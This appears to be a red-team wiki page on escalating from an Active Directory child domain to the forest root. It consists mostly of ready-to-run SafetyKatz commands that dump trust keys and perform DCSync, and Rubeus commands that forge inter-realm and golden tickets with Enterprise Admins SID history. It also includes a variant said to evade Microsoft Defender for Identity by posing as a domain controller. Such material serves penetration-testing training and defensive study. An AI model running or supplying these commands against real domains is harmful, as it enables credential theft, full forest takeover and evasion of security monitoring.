child-to-forest-trust-key

Child to Forest Root - Trust Key

Methodology

Dump the trust key of the child domain (Credentials -> Hash NTLM).
Forge an inter-forest ticket.
Inject the ticket.

Binaries

[!INFO] Remember to follow the Binaries methodology

SafetyKatz

Get the trust key:

SafetyKatz.exe '"lsadump::trust /patch"'
SafetyKatz.exe '"lsadump::dcsync /user:contoso\techcorp$"'
SafetyKatz.exe '"lsadump::lsa /patch"'

Rubeus

Forge a interrealm TGT:

Rubeus.exe silver /user:Administrator /ldap /service:krbtgt/TECHCORP.LOCAL /rc4:a6215eeb238da9262d014a529fe03adb /sids:S-1-5-21-2781415573-3701854478-2406986946-519 /nowrap

where:

silver - Creates a forged Silver Ticket (TGS) for service authentication.
/user - Specifies the username to impersonate (e.g., Administrator).
/ldap - Targets the LDAP service on Domain Controllers.
/service - Specifies the service principal name (format: krbtgt/DOMAIN.LOCAL).
/rc4 - Provides the NTLM hash of the trust key account for ticket signing .
/sids - Adds Enterprise Admins SIDs to the ticket (e.g., Enterprise Admins S-1-5-21-...-519) .

Request a TGS:

Rubeus.exe asktgs /service:CIFS/techcorpdc.TECHCORP.LOCAL /dc:techcorp-dc.TECHCORP.LOCAL /ptt /ticket:

[!INFO] Different SPN and what they're used for:
CIFS for directory browsing, copying files.
HTTP for WinRS.
HOST and CIFS for psexec.
HOST and RPCSS for WMI.
HOST and HTTP for PowerShell Remoting/WINRM.
LDAP for dcsync

Child to Forest Root - krbtgt

We need to simply forge a Golden ticket (not an inter-realm TGT) with sIDHistory of the Enterprise Admins group.

Binaries

[!INFO] Remember to follow the Binaries methodology

Rubeus

Forge an interrealm golden ticket:

Rubeus.exe golden /user:Administrator /domain:us.techcorp.local /sid:S-1-5-21-2781415573-3701854478-2406986946 /krbtgt:a6215eeb238da9262d014a529fe03adb /sids:S-1-5-21-2781415573-3701854478-2406986946-519 /groups:513 /ptt /nowrap

where:

golden - Specifies Golden Ticket attack mode in Rubeus
/user - Specifies the username to impersonate (e.g., Administrator)
/domain - Targets the forest root domain (e.g., us.techcorp.local)
/sid - Provides the current domain's SID
/krbtgt - Uses the NTLM hash of the child domain's KRBTGT account
/sids - Adds Enterprise Admins group SID (-519) for forest-wide privileges
/ptt - Injects ticket directly into memory (Pass-the-Ticket)
/nowrap - Outputs ticket without base64 line wrapping

Avoid suspicious logs and bypass MDI by using Domain Controller identity:

Rubeus.exe golden /user:us-dc$ /id:1000 /domain:us.techcorp.local /sid:S-1-5-21-210670787-2521448726-163245708 /groups:513 /sids:S-1-5-21-2781415573-3701854478-2406986946-516,S-1-5-9 /aes256:5E3D2096ABB01469A3B0350962B0C65CEDBBC611C5EAC6F3EF6FC1FFA58CACD5 /dc:us-dc.us.techcorp.local /ptt

S-1-5-21-2578538781-2508153159-3419410681-516 – Domain Controllers
S-1-5-9 – Enterprise Domain Controllers

Previousad-cs Nextentra-id-phs-integration

Last updated 1 month ago